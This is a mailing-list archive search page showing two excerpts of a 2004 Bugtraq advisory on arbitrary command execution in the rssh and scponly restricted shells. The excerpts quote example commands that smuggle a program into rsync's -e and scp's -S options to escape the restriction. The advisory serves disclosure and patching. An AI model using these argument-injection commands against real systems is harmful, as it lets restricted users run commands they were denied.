search for: restricteduser

Displaying 2 results from an estimated 2 matches for "restricteduser".

2005 Jan 15
0
rssh and scponly arbitrary command execution
...ulnerable. rssh with cvs is > also not vulnerable using these techniques. However, it is quite probable > that a malicious user could check out a carefully crafted CVS repository and > execute arbitrary commands using CVS's hooks interface. > > Examples: > > ssh restricteduser at remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp' > > scp command.sh restricteduser at remotehost:/tmp/command.sh > ssh restricteduser at remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp' > > Solution: &gt...
2004 Dec 03
1
[BUGTRAQ] rssh and scponly arbitrary command execution
...sftp-server does not appear to be vulnerable. rssh with cvs is also not vulnerable using these techniques. However, it is quite probable that a malicious user could check out a carefully crafted CVS repository and execute arbitrary commands using CVS's hooks interface. Examples: ssh restricteduser at remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp' scp command.sh restricteduser at remotehost:/tmp/command.sh ssh restricteduser at remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp' Solution: There are no workarounds fo...